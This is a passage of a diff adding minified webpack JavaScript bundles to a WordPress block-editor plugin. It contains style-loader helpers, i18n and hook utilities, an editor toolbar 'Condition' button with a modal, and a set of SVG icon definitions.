a=n(3379),r=n.n(a),o=n(7795),i=n.n(o),l=n(569),s=n.n(l),p=n(3565),c=n.n(p),d=n(9216),u=n.n(d),m=n(4589),f=n.n(m),h=n(6922),g={};g.styleTagTransform=f(),g.setAttributes=c(),g.insert=s().bind(null,"head"),g.domAPI=i(),g.insertStyleElement=u(),r()(h.Z,g),h.Z&&h.Z.locals&&h.Z.locals},2413:(e,t,n)=>{"use strict";var a=n(3379),r=n.n(a),o=n(7795),i=n.n(o),l=n(569),s=n.n(l),p=n(3565),c=n.n(p),d=n(9216),u=n.n(d),m=n(4589),f=n.n(m),h=n(439),g={};g.styleTagTransform=f(),g.setAttributes=c(),g.insert=s().bind(null,"head"),g.domAPI=i(),g.insertStyleElement=u(),r()(h.Z,g),h.Z&&h.Z.locals&&h.Z.locals},6509:(e,t,n)=>{"use strict";var a=n(3379),r=n.n(a),o=n(7795),i=n.n(o),l=n(569),s=n.n(l),p=n(3565),c=n.n(p),d=n(9216),u=n.n(d),m=n(4589),f=n.n(m),h=n(9839),g={};g.styleTagTransform=f(),g.setAttributes=c(),g.insert=s().bind(null,"head"),g.domAPI=i(),g.insertStyleElement=u(),r()(h.Z,g),h.Z&&h.Z.locals&&h.Z.locals},619:(e,t,n)=>{"use strict";var a=n(3379),r=n.n(a),o=n(7795),i=n.n(o),l=n(569),s=n.n(l),p=n(3565),c=n.n(p),d=n(9216),u=n.n(d),m=n(4589),f=n.n(m),h=n(1211),g={};g.styleTagTransform=f(),g.setAttributes=c(),g.insert=s().bind(null,"head"),g.domAPI=i(),g.insertStyleElement=u(),r()(h.Z,g),h.Z&&h.Z.locals&&h.Z.locals},2158:(e,t,n)=>{"use strict";var a=n(3379),r=n.n(a),o=n(7795),i=n.n(o),l=n(569),s=n.n(l),p=n(3565),c=n.n(p),d=n(9216),u=n.n(d),m=n(4589),f=n.n(m),h=n(1589),g={};g.styleTagTransform=f(),g.setAttributes=c(),g.insert=s().bind(null,"head"),g.domAPI=i(),g.insertStyleElement=u(),r()(h.Z,g),h.Z&&h.Z.locals&&h.Z.locals},4201:(e,t,n)=>{"use strict";var a=n(3379),r=n.n(a),o=n(7795),i=n.n(o),l=n(569),s=n.n(l),p=n(3565),c=n.n(p),d=n(9216),u=n.n(d),m=n(4589),f=n.n(m),h=n(1729),g={};g.styleTagTransform=f(),g.setAttributes=c(),g.insert=s().bind(null,"head"),g.domAPI=i(),g.insertStyleElement=u(),r()(h.Z,g),h.Z&&h.Z.locals&&h.Z.locals},3379:e=>{"use strict";var t=[];function n(e){for(var n=-1,a=0;a<t.length;a++)if(t[a].identifier===e){n=a;break}return n}function a(e,a){for(var o={},i=[],l=0;l<e.length;l++){var s=e[l],p=a.base?s[0]+a.base:s[0],c=o[p]||0,d="".concat(p," ").concat(c);o[p]=c+1;var u=n(d),m={css:s[1],media:s[2],sourceMap:s[3],supports:s[4],layer:s[5]};if(-1!==u)t[u].references++,t[u].updater(m);else{var f=r(m,a);a.byIndex=l,t.splice(l,0,{identifier:d,updater:f,references:1})}i.push(d)}return i}function r(e,t){var n=t.domAPI(t);return n.update(e),function(t){if(t){if(t.css===e.css&&t.media===e.media&&t.sourceMap===e.sourceMap&&t.supports===e.supports&&t.layer===e.layer)return;n.update(e=t)}else n.remove()}}e.exports=function(e,r){var o=a(e=e||[],r=r||{});return function(e){e=e||[];for(var i=0;i<o.length;i++){var l=n(o[i]);t[l].references--}for(var s=a(e,r),p=0;p<o.length;p++){var c=n(o[p]);0===t[c].references&&(t[c].updater(),t.splice(c,1))}o=s}}},569:e=>{"use strict";var t={};e.exports=function(e,n){var a=function(e){if(void 0===t[e]){var n=document.querySelector(e);if(window.HTMLIFrameElement&&n instanceof window.HTMLIFrameElement)try{n=n.contentDocument.head}catch(e){n=null}t[e]=n}return t[e]}(e);if(!a)throw new Error("Couldn't find a style target. This probably means that the value for the 'insert' parameter is invalid.");a.appendChild(n)}},9216:e=>{"use strict";e.exports=function(e){var t=document.createElement("style");return e.setAttributes(t,e.attributes),e.insert(t,e.options),t}},3565:(e,t,n)=>{"use strict";e.exports=function(e){var t=n.nc;t&&e.setAttribute("nonce",t)}},7795:e=>{"use strict";e.exports=function(e){if("undefined"==typeof document)return{update:function(){},remove:function(){}};var t=e.insertStyleElement(e);return{update:function(n){!function(e,t,n){var a="";n.supports&&(a+="@supports (".concat(n.supports,") {")),n.media&&(a+="@media ".concat(n.media," {"));var r=void 0!==n.layer;r&&(a+="@layer".concat(n.layer.length>0?" ".concat(n.layer):""," {")),a+=n.css,r&&(a+="}"),n.media&&(a+="}"),n.supports&&(a+="}");var o=n.sourceMap;o&&"undefined"!=typeof btoa&&(a+="\n/*# sourceMappingURL=data:application/json;base64,".concat(btoa(unescape(encodeURIComponent(JSON.stringify(o))))," */")),t.styleTagTransform(a,e,t.options)}(t,e,n)},remove:function(){!function(e){if(null===e.parentNode)return!1;e.parentNode.removeChild(e)}(t)}}}},4589:e=>{"use strict";e.exports=function(e,t){if(t.styleSheet)t.styleSheet.cssText=e;else{for(;t.firstChild;)t.removeChild(t.firstChild);t.appendChild(document.createTextNode(e))}}},5022:(e,t,n)=>{"use strict";n.d(t,{Z:()=>o});var a=n(7680),r={contextDelimiter:"",onMissingKey:null};function o(e,t){var n;for(n in this.data=e,this.pluralForms={},this.options={},r)this.options[n]=void 0!==t&&n in t?t[n]:r[n]}o.prototype.getPluralForm=function(e,t){var n,r,o,i=this.pluralForms[e];return i||("function"!=typeof(o=(n=this.data[e][""])["Plural-Forms"]||n["plural-forms"]||n.plural_forms)&&(r=function(e){var t,n,a;for(t=e.split(";"),n=0;n<t.length;n++)if(0===(a=t[n].trim()).indexOf("plural="))return a.substr(7)}(n["Plural-Forms"]||n["plural-forms"]||n.plural_forms),o=(0,a.Z)(r)),i=this.pluralForms[e]=o),i(t)},o.prototype.dcnpgettext=function(e,t,n,a,r){var o,i,l;return o=void 0===r?0:this.getPluralForm(e,r),i=n,t&&(i=t+this.options.contextDelimiter+n),(l=this.data[e][i])&&l[o]?l[o]:(this.options.onMissingKey&&this.options.onMissingKey(n,e),0===o?n:a)}},4975:e=>{"use strict";e.exports="data:image/svg+xml,%3Csvg width=%2742%27 height=%2742%27 viewBox=%270 0 42 42%27 fill=%27none%27 xmlns=%27http://www.w3.org/2000/svg%27%3E%3Cpath d=%27M0 42V7C0 3.13401 3.13401 0 7 0H42L0 42Z%27 fill=%27%23FF285E%27/%3E%3C/svg%3E"},7462:(e,t,n)=>{"use strict";function a(){return a=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var n=arguments[t];for(var a in n)Object.prototype.hasOwnProperty.call(n,a)&&(e[a]=n[a])}return e},a.apply(this,arguments)}n.d(t,{Z:()=>a})},6290:(e,t,n)=>{"use strict";function a(e,t){var n,a,r=0;function o(){var o,i,l=n,s=arguments.length;e:for(;l;){if(l.args.length===arguments.length){for(i=0;i<s;i++)if(l.args[i]!==arguments[i]){l=l.next;continue e}return l!==n&&(l===a&&(a=l.prev),l.prev.next=l.next,l.next&&(l.next.prev=l.prev),l.next=n,l.prev=null,n.prev=l,n=l),l.val}l=l.next}for(o=new Array(s),i=0;i<s;i++)o[i]=arguments[i];return l={args:o,val:e.apply(null,o)},n?(n.prev=l,l.next=n):a=l,r===t.maxSize?(a=a.prev).next=null:r++,n=l,l.val}return t=t||{},o.clear=function(){n=null,a=null,r=0},o}n.d(t,{Z:()=>a})}},t={};function n(a){var r=t[a];if(void 0!==r)return r.exports;var o=t[a]={id:a,exports:{}};return e[a](o,o.exports,n),o.exports}n.m=e,n.n=e=>{var t=e&&e.__esModule?()=>e.default:()=>e;return n.d(t,{a:t}),t},n.d=(e,t)=>{for(var a in t)n.o(t,a)&&!n.o(e,a)&&Object.defineProperty(e,a,{enumerable:!0,get:t[a]})},n.o=(e,t)=>Object.prototype.hasOwnProperty.call(e,t),n.b=document.baseURI||self.location.href,n.nc=void 0,(()=>{"use strict";var e=n(7294),t=n(3935),a=n(8351);if(document.querySelector(".block-editor-page")){const{subscribe:n}=wp.data,r=n((()=>{let n=document.querySelector(".editor-header__toolbar");if(n||(n=document.querySelector(".edit-post-header__toolbar")),n||(n=document.querySelector(".edit-post-header-toolbar")),!n)return;const o=document.createElement("div");o.className="toolbar-insert-layout",o.innerHTML='<button id="UltpConditionButton" class="ultp-popup-button" aria-label="Insert Layout"><span class="dashicons dashicons-admin-settings"></span>Condition</button>',["404","front_page"].includes(ultp_data.archive)||n.appendChild(o),setTimeout((function(){void 0!==document.getElementsByClassName("edit-post-fullscreen-mode-close")[0]&&(document.getElementsByClassName("edit-post-fullscreen-mode-close")[0].href=ultp_condition.builder_url)}),0);let i=1;function l(){if(i){const n=document.createElement("div");n.id="ultp-modal-conditions",n.className="ultp-builder-modal ultp-blocks-layouts",document.body.appendChild(n),t.render((0,e.createElement)(a.Z,{has_ultp_condition:!0,notEditor:"yes"}),n),i=0,setTimeout((function(){i=1}),2e3)}}void 0!==document.getElementsByClassName("editor-post-publish-button__button editor-post-publish-panel__toggle")[0]&&(["404","front_page"].includes(ultp_data.archive)||l()),["404","front_page"].includes(ultp_data.archive)||document.getElementById("UltpConditionButton")?.addEventListener("click",(function(){l()})),r()}))}})()})();
\ No newline at end of file
+(()=>{var e={1974:(e,t,n)=>{"use strict";n.d(t,{Z:()=>o});var a=n(2141),r=n(192);function o(e){var t=(0,a.Z)(e);return function(e){return(0,r.Z)(t,e)}}},192:(e,t,n)=>{"use strict";n.d(t,{Z:()=>r});var a={"!":function(e){return!e},"*":function(e,t){return e*t},"/":function(e,t){return e/t},"%":function(e,t){return e%t},"+":function(e,t){return e+t},"-":function(e,t){return e-t},"<":function(e,t){return e<t},"<=":function(e,t){return e<=t},">":function(e,t){return e>t},">=":function(e,t){return e>=t},"==":function(e,t){return e===t},"!=":function(e,t){return e!==t},"&&":function(e,t){return e&&t},"||":function(e,t){return e||t},"?:":function(e,t,n){if(e)throw t;return n}};function r(e,t){var n,r,o,i,l,s,p=[];for(n=0;n<e.length;n++){if(l=e[n],i=a[l]){for(r=i.length,o=Array(r);r--;)o[r]=p.pop();try{s=i.apply(null,o)}catch(e){return e}}else s=t.hasOwnProperty(l)?t[l]:+l;p.push(s)}return p[0]}},7680:(e,t,n)=>{"use strict";n.d(t,{Z:()=>r});var a=n(1974);function r(e){var t=(0,a.Z)(e);return function(e){return+t({n:e})}}},2141:(e,t,n)=>{"use strict";var a,r,o,i;function l(e){for(var t,n,l,s,p=[],c=[];t=e.match(i);){for(n=t[0],(l=e.substr(0,t.index).trim())&&p.push(l);s=c.pop();){if(o[n]){if(o[n][0]===s){n=o[n][1]||n;break}}else if(r.indexOf(s)>=0||a[s]<a[n]){c.push(s);break}p.push(s)}o[n]||c.push(n),e=e.substr(t.index+n.length)}return(e=e.trim())&&p.push(e),p.concat(c.reverse())}n.d(t,{Z:()=>l}),a={"(":9,"!":8,"*":7,"/":7,"%":7,"+":6,"-":6,"<":5,"<=":5,">":5,">=":5,"==":4,"!=":4,"&&":3,"||":2,"?":1,"?:":1},r=["(","?"],o={")":["("],":":["?","?:"]},i=/<=|>=|==|!=|&&|\|\||\?:|\(|!|\*|\/|%|\+|-|<|>|\?|\)|:/},8247:(e,t,n)=>{"use strict";n.d(t,{Z:()=>o});var a=n(4103),r=n(1755);const o=function(e,t){return function(n,o,i,l=10){const s=e[t];if(!(0,r.Z)(n))return;if(!(0,a.Z)(o))return;if("function"!=typeof i)return void console.error("The hook callback must be a function.");if("number"!=typeof l)return void console.error("If specified, the hook priority must be a number.");const p={callback:i,priority:l,namespace:o};if(s[n]){const e=s[n].handlers;let t;for(t=e.length;t>0&&!(l>=e[t-1].priority);t--);t===e.length?e[t]=p:e.splice(t,0,p),s.__current.forEach((e=>{e.name===n&&e.currentIndex>=t&&e.currentIndex++}))}else s[n]={handlers:[p],runs:0};"hookAdded"!==n&&e.doAction("hookAdded",n,o,i,l)}}},9992:(e,t,n)=>{"use strict";n.d(t,{Z:()=>a});const a=function(e,t){return function(){var n;const a=e[t];return null!==(n=a.__current[a.__current.length-1]?.name)&&void 0!==n?n:null}}},3972:(e,t,n)=>{"use strict";n.d(t,{Z:()=>r});var a=n(1755);const r=function(e,t){return function(n){const r=e[t];if((0,a.Z)(n))return r[n]&&r[n].runs?r[n].runs:0}}},1786:(e,t,n)=>{"use strict";n.d(t,{Z:()=>a});const a=function(e,t){return function(n){const a=e[t];return void 0===n?void 0!==a.__current[0]:!!a.__current[0]&&n===a.__current[0].name}}},8642:(e,t,n)=>{"use strict";n.d(t,{Z:()=>a});const a=function(e,t){return function(n,a){const r=e[t];return void 0!==a?n in r&&r[n].handlers.some((e=>e.namespace===a)):n in r}}},1019:(e,t,n)=>{"use strict";n.d(t,{Z:()=>d});var a=n(8247),r=n(9099),o=n(8642),i=n(6424),l=n(9992),s=n(1786),p=n(3972);class c{constructor(){this.actions=Object.create(null),this.actions.__current=[],this.filters=Object.create(null),this.filters.__current=[],this.addAction=(0,a.Z)(this,"actions"),this.addFilter=(0,a.Z)(this,"filters"),this.removeAction=(0,r.Z)(this,"actions"),this.removeFilter=(0,r.Z)(this,"filters"),this.hasAction=(0,o.Z)(this,"actions"),this.hasFilter=(0,o.Z)(this,"filters"),this.removeAllActions=(0,r.Z)(this,"actions",!0),this.removeAllFilters=(0,r.Z)(this,"filters",!0),this.doAction=(0,i.Z)(this,"actions"),this.applyFilters=(0,i.Z)(this,"filters",!0),this.currentAction=(0,l.Z)(this,"actions"),this.currentFilter=(0,l.Z)(this,"filters"),this.doingAction=(0,s.Z)(this,"actions"),this.doingFilter=(0,s.Z)(this,"filters"),this.didAction=(0,p.Z)(this,"actions"),this.didFilter=(0,p.Z)(this,"filters")}}const d=function(){return new c}},9099:(e,t,n)=>{"use strict";n.d(t,{Z:()=>o});var a=n(4103),r=n(1755);const o=function(e,t,n=!1){return function(o,i){const l=e[t];if(!(0,r.Z)(o))return;if(!n&&!(0,a.Z)(i))return;if(!l[o])return 0;let s=0;if(n)s=l[o].handlers.length,l[o]={runs:l[o].runs,handlers:[]};else{const e=l[o].handlers;for(let t=e.length-1;t>=0;t--)e[t].namespace===i&&(e.splice(t,1),s++,l.__current.forEach((e=>{e.name===o&&e.currentIndex>=t&&e.currentIndex--})))}return"hookRemoved"!==o&&e.doAction("hookRemoved",o,i),s}}},6424:(e,t,n)=>{"use strict";n.d(t,{Z:()=>a});const a=function(e,t,n=!1){return function(a,...r){const o=e[t];o[a]||(o[a]={handlers:[],runs:0}),o[a].runs++;const i=o[a].handlers;if(!i||!i.length)return n?r[0]:void 0;const l={name:a,currentIndex:0};for(o.__current.push(l);l.currentIndex<i.length;){const e=i[l.currentIndex].callback.apply(null,r);n&&(r[0]=e),l.currentIndex++}return o.__current.pop(),n?r[0]:void 0}}},1957:(e,t,n)=>{"use strict";n.d(t,{JQ:()=>a});const a=(0,n(1019).Z)(),{addAction:r,addFilter:o,removeAction:i,removeFilter:l,hasAction:s,hasFilter:p,removeAllActions:c,removeAllFilters:d,doAction:u,applyFilters:m,currentAction:f,currentFilter:h,doingAction:g,doingFilter:v,didAction:_,didFilter:w,actions:b,filters:x}=a},1755:(e,t,n)=>{"use strict";n.d(t,{Z:()=>a});const a=function(e){return"string"!=typeof e||""===e?(console.error("The hook name must be a non-empty string."),!1):/^__/.test(e)?(console.error("The hook name cannot begin with `__`."),!1):!!/^[a-zA-Z][a-zA-Z0-9_.-]*$/.test(e)||(console.error("The hook name can only contain numbers, letters, dashes, periods and underscores."),!1)}},4103:(e,t,n)=>{"use strict";n.d(t,{Z:()=>a});const a=function(e){return"string"!=typeof e||""===e?(console.error("The namespace must be a non-empty string."),!1):!!/^[a-zA-Z][a-zA-Z0-9_.\-\/]*$/.test(e)||(console.error("The namespace can only contain numbers, letters, dashes, periods, underscores and slashes."),!1)}},6016:(e,t,n)=>{"use strict";n.d(t,{o:()=>i});var a=n(5022);const r={plural_forms:e=>1===e?0:1},o=/^i18n\.(n?gettext|has_translation)(_|$)/,i=(e,t,n)=>{const i=new a.Z({}),l=new Set,s=()=>{l.forEach((e=>e()))},p=(e,t="default")=>{i.data[t]={...i.data[t],...e},i.data[t][""]={...r,...i.data[t]?.[""]},delete i.pluralForms[t]},c=(e,t)=>{p(e,t),s()},d=(e="default",t,n,a,r)=>(i.data[e]||p(void 0,e),i.dcnpgettext(e,t,n,a,r)),u=(e="default")=>e,_x=(e,t,a)=>{let r=d(a,t,e);return n?(r=n.applyFilters("i18n.gettext_with_context",r,e,t,a),n.applyFilters("i18n.gettext_with_context_"+u(a),r,e,t,a)):r};if(e&&c(e,t),n){const e=e=>{o.test(e)&&s()};n.addAction("hookAdded","core/i18n",e),n.addAction("hookRemoved","core/i18n",e)}return{getLocaleData:(e="default")=>i.data[e],setLocaleData:c,addLocaleData:(e,t="default")=>{i.data[t]={...i.data[t],...e,"":{...r,...i.data[t]?.[""],...e?.[""]}},delete i.pluralForms[t],s()},resetLocaleData:(e,t)=>{i.data={},i.pluralForms={},c(e,t)},subscribe:e=>(l.add(e),()=>l.delete(e)),__:(e,t)=>{let a=d(t,void 0,e);return n?(a=n.applyFilters("i18n.gettext",a,e,t),n.applyFilters("i18n.gettext_"+u(t),a,e,t)):a},_x,_n:(e,t,a,r)=>{let o=d(r,void 0,e,t,a);return n?(o=n.applyFilters("i18n.ngettext",o,e,t,a,r),n.applyFilters("i18n.ngettext_"+u(r),o,e,t,a,r)):o},_nx:(e,t,a,r,o)=>{let i=d(o,r,e,t,a);return n?(i=n.applyFilters("i18n.ngettext_with_context",i,e,t,a,r,o),n.applyFilters("i18n.ngettext_with_context_"+u(o),i,e,t,a,r,o)):i},isRTL:()=>"rtl"===_x("ltr","text direction"),hasTranslation:(e,t,a)=>{const r=t?t+""+e:e;let o=!!i.data?.[null!=a?a:"default"]?.[r];return n&&(o=n.applyFilters("i18n.has_translation",o,e,t,a),o=n.applyFilters("i18n.has_translation_"+u(a),o,e,t,a)),o}}}},7836:(e,t,n)=>{"use strict";n.d(t,{__:()=>__});var a=n(6016),r=n(1957);const o=(0,a.o)(void 0,void 0,r.JQ);o.getLocaleData.bind(o),o.setLocaleData.bind(o),o.resetLocaleData.bind(o),o.subscribe.bind(o);const __=o.__.bind(o);o._x.bind(o),o._n.bind(o),o._nx.bind(o),o.isRTL.bind(o),o.hasTranslation.bind(o)},2304:(e,t,n)=>{"use strict";n.d(t,{__:()=>a.__}),n(5917),n(6016);var a=n(7836)},5917:(e,t,n)=>{"use strict";var a=n(6290);n(8975),(0,a.Z)(console.error)},4528:(e,t,n)=>{"use strict";n.d(t,{c:()=>r});var a=n(7294);const r={add_plus_shopping_cart_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M5.862 3.76A1.75 1.75 0 0 0 4.13 2.25H2a.75.75 0 0 0 0 1.5h2.129a.25.25 0 0 1 .247.216l1.762 12.773c.059.427.27.8.572 1.069a2.5 2.5 0 1 0 4.33.442h5.17a2.5 2.5 0 1 0 2.29-1.5H7.871a.25.25 0 0 1-.247-.216l-.183-1.32 12.36-1.068a1.75 1.75 0 0 0 1.573-1.433l1.152-6.403a1.75 1.75 0 0 0-1.722-2.06H5.93l-.068-.49ZM7.75 19.25a1 1 0 1 1 2 0 1 1 0 0 1-2 0Zm9.75 0a1 1 0 1 1 2 0 1 1 0 0 1-2 0Zm-4.505-7.75v-1.245H11.75a.75.75 0 0 1 0-1.5h1.245V7.5a.75.75 0 0 1 1.5 0v1.255h1.255a.75.75 0 0 1 0 1.5h-1.255V11.5a.75.75 0 0 1-1.5 0Z",clipRule:"evenodd"})),android_logo_icon_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M20 10.25a.75.75 0 0 1 .75.75v6a.75.75 0 0 1-1.5 0v-6a.75.75 0 0 1 .75-.75Zm-16 0a.75.75 0 0 1 .75.75v6a.75.75 0 0 1-1.5 0v-6a.75.75 0 0 1 .75-.75ZM8.05 1.4a.75.75 0 0 0-.15 1.05l1.153 1.537A6.249 6.249 0 0 0 5.75 9.5v.5h12.5v-.5a6.249 6.249 0 0 0-3.303-5.513L16.1 2.45a.75.75 0 1 0-1.2-.9l-1.41 1.879a6.266 6.266 0 0 0-2.98 0L9.1 1.55a.75.75 0 0 0-1.05-.15ZM9.74 8a.75.75 0 0 1 .75-.75h.01a.75.75 0 0 1 0 1.5h-.01A.75.75 0 0 1 9.74 8Zm3.75-.75a.75.75 0 0 0 0 1.5h.01a.75.75 0 0 0 0-1.5h-.01Z",clipRule:"evenodd"}),(0,a.createElement)("path",{d:"M5.75 11.5V17a2.75 2.75 0 0 0 2.75 2.75h.25V22a.75.75 0 0 0 1.5 0v-2.25h4V22a.75.75 0 0 0 1.5 0v-2.261A2.75 2.75 0 0 0 18.25 17v-5.5H5.75Z"})),angry_emoji_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25ZM6.25 9.5A.75.75 0 0 1 7 8.75c.549 0 1.303.068 1.982.285.632.202 1.458.619 1.704 1.493.043.152.064.31.064.472 0 .527-.197 1.1-.77 1.322-.493.192-.974-.001-1.25-.237-.277-.238-.62-.793-.262-1.39.044-.074.096-.14.153-.2a2.804 2.804 0 0 0-.095-.031C8.04 10.309 7.45 10.25 7 10.25a.75.75 0 0 1-.75-.75Zm8.768-.465c.678-.217 1.433-.285 1.982-.285a.75.75 0 0 1 0 1.5c-.451 0-1.041.059-1.526.214-.033.01-.065.021-.095.032.057.059.109.125.153.2.359.596.015 1.151-.262 1.389-.276.236-.758.429-1.25.237-.573-.223-.77-.795-.77-1.322 0-.162.021-.32.064-.472.246-.874 1.072-1.291 1.704-1.493Zm-6.347 8.3C9.262 16.153 10.58 15.5 12 15.5c1.42 0 2.738.653 3.33 1.835a.75.75 0 1 0 1.34-.67C15.763 14.847 13.83 14 12 14s-3.762.847-4.67 2.665a.75.75 0 0 0 1.34.67Z",clipRule:"evenodd"})),apple_logo_icon_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M20.054 8.58c-.123.096-2.287 1.337-2.287 4.095 0 3.191 2.754 4.32 2.836 4.348-.012.069-.437 1.546-1.452 3.051-.904 1.325-1.849 2.647-3.286 2.647s-1.806-.85-3.465-.85c-1.617 0-2.192.878-3.506.878-1.315 0-2.232-1.226-3.286-2.73-1.222-1.768-2.209-4.514-2.209-7.12 0-2.07.655-3.658 1.636-4.735 1-1.097 2.337-1.662 3.664-1.662 1.397 0 2.562.933 3.439.933.834 0 2.136-.989 3.725-.989.602 0 2.767.056 4.19 2.133Zm-4.945-3.904a5.04 5.04 0 0 0 .84-1.467 4.462 4.462 0 0 0 .282-1.528c0-.152-.013-.307-.04-.432-1.07.04-2.342.725-3.109 1.63-.602.697-1.164 1.797-1.164 2.913 0 .168.027.336.04.39.068.013.178.028.287.028.96 0 2.167-.654 2.864-1.534Z"})),arrow_down_bottom_downward_circle_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25Zm1 6.25a1 1 0 1 0-2 0v6.586l-1.793-1.793a1 1 0 0 0-1.414 1.414l3.5 3.5a1 1 0 0 0 1.414 0l3.5-3.5a1 1 0 0 0-1.414-1.414L13 14.086V7.5Z",clipRule:"evenodd"})),arrow_down_bottom_downward_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M11 3.5a1 1 0 1 1 2 0v14.586l6.793-6.793a1 1 0 1 1 1.414 1.414l-8.5 8.5a1 1 0 0 1-1.414 0l-8.5-8.5a1 1 0 0 1 1.338-1.482l.076.068L11 18.086V3.5Z"})),arrow_down_bottom_left_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M17.293 5.293a1 1 0 1 1 1.414 1.414L8.414 17H18a1 1 0 1 1 0 2H6a1 1 0 0 1-1-1V6a1 1 0 0 1 2 0v9.586L17.293 5.293Z"})),arrow_down_bottom_right_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M5.293 5.293a1 1 0 0 1 1.414 0L17 15.586V6a1 1 0 1 1 2 0v12a1 1 0 0 1-1 1H6a1 1 0 1 1 0-2h9.586L5.293 6.707a1 1 0 0 1 0-1.414Z"})),arrow_down_dropdown_maximize_chevron_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M18 8.25a.75.75 0 0 1 .53 1.28l-6 6a.75.75 0 0 1-1.06 0l-6-6A.75.75 0 0 1 6 8.25h12Z"})),arrow_left_backward_circle_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25Zm-.293 7.957a1 1 0 0 0-1.414-1.414l-3.5 3.5a1 1 0 0 0 0 1.414l3.5 3.5a1 1 0 0 0 1.414-1.414L9.914 13H16.5a1 1 0 1 0 0-2H9.914l1.793-1.793Z",clipRule:"evenodd"})),arrow_left_backward_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M11.293 2.793a1 1 0 1 1 1.414 1.414L5.914 11H20.5a1 1 0 1 1 0 2H5.914l6.793 6.793.068.076a1 1 0 0 1-1.406 1.406l-.076-.068-8.5-8.5a1 1 0 0 1 0-1.414l8.5-8.5Z"})),arrow_left_previous_backward_chevron_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M14.47 5.47a.75.75 0 0 1 1.28.53v12a.75.75 0 0 1-1.28.53l-6-6a.75.75 0 0 1 0-1.06l6-6Z"})),arrow_move_down_left_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M6.293 7.293A1 1 0 0 1 8 8v4h10a3 3 0 0 0 3-3V6a1 1 0 1 1 2 0v3a5 5 0 0 1-5 5H8v4a1 1 0 0 1-1.707.707l-5-5a1 1 0 0 1 0-1.414l5-5Z"})),arrow_move_down_right_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M16.617 7.076a1 1 0 0 1 1.09.217l5 5a1 1 0 0 1 0 1.414l-5 5A1 1 0 0 1 16 18v-4H6a5 5 0 0 1-5-5V6a1 1 0 0 1 2 0v3a3 3 0 0 0 3 3h10V8a1 1 0 0 1 .617-.924Z"})),arrow_move_up_left_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M21 18v-3a3 3 0 0 0-3-3H8v4a1 1 0 0 1-1.707.707l-5-5a1 1 0 0 1 0-1.414l5-5A1 1 0 0 1 8 6v4h10a5 5 0 0 1 5 5v3a1 1 0 1 1-2 0Z"})),arrow_move_up_right_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M1 18v-3a5 5 0 0 1 5-5h10V6a1 1 0 0 1 1.707-.707l5 5a1 1 0 0 1 0 1.414l-5 5A1 1 0 0 1 16 16v-4H6a3 3 0 0 0-3 3v3a1 1 0 1 1-2 0Z"})),arrow_right_forward_circle_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25Zm1.707 6.543a1 1 0 1 0-1.414 1.414L14.086 11H7.5a1 1 0 1 0 0 2h6.586l-1.793 1.793a1 1 0 0 0 1.414 1.414l3.5-3.5a1 1 0 0 0 0-1.414l-3.5-3.5Z",clipRule:"evenodd"})),arrow_right_forward_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M11.293 2.793a1 1 0 0 1 1.414 0l8.5 8.5a1 1 0 0 1 0 1.414l-8.5 8.5a1 1 0 1 1-1.414-1.414L18.086 13H3.5a1 1 0 1 1 0-2h14.586l-6.793-6.793-.068-.076a1 1 0 0 1 